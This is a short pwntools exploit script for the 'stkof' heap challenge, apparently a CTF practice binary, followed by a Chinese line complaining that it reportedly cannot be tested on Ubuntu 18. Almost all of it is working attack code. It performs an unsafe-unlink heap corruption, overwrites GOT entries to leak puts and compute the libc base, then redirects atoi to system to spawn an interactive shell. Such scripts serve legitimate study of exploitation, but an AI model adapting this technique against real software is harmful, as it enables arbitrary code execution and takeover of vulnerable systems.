from pwn import *
p= process("./stkof")
libc = ELF("./libc.so.6")
elf = ELF("./stkof")
def create(size):
p.sendline('1')
p.sendline(str(size))
p.recvuntil('OK\n')
def edit(index,size,content):
p.sendline('2')
p.sendline(str(index))
p.sendline(str(size))
p.sendline(content)
p.recvuntil('OK\n')
def free(index):
p.sendline('3')
p.sendline(str(index))
address=0x602140
create(0x100)
create(0x30)
create(0x80)
payload=p64(0)+p64(0x20)+p64(address+16-0x18)+p64(address+16-0x10)+p64(0x20)
payload=payload.ljust(0x30,'a')
payload+=p64(0x30)+p64(0x90)
edit(2,len(payload),payload)
free(3)
p.recvuntil('OK\n')
payload1='a'*8+p64(elf.got['free'])+p64(elf.got['puts'])+p64(elf.got['atoi'])
edit(2,len(payload1),payload1)
edit(0,len(p64(elf.plt['puts'])),p64(elf.plt['puts']))
free(1)
puts_addr = p.recvuntil('\nOK\n',drop=True).ljust(8, '\x00')
puts_addr = u64(puts_addr)
libc_base=puts_addr-libc.symbols['puts']
system_addr=libc_base+libc.symbols['system']
binsh=libc_base+next(libc.search('/bin/sh'))
log.success('puts addr: ' + hex(puts_addr))
log.success('libc base: ' + hex(libc_base))
log.success('/bin/sh addr: ' + hex(binsh))
log.success('system addr: ' + hex(system_addr))
payload=p64(system_addr)
edit(2,len(payload),payload)
p.sendline(p64(binsh))
p.interactive()
难受,好不容易写出来结果发现网上说Ubuntu18测试不了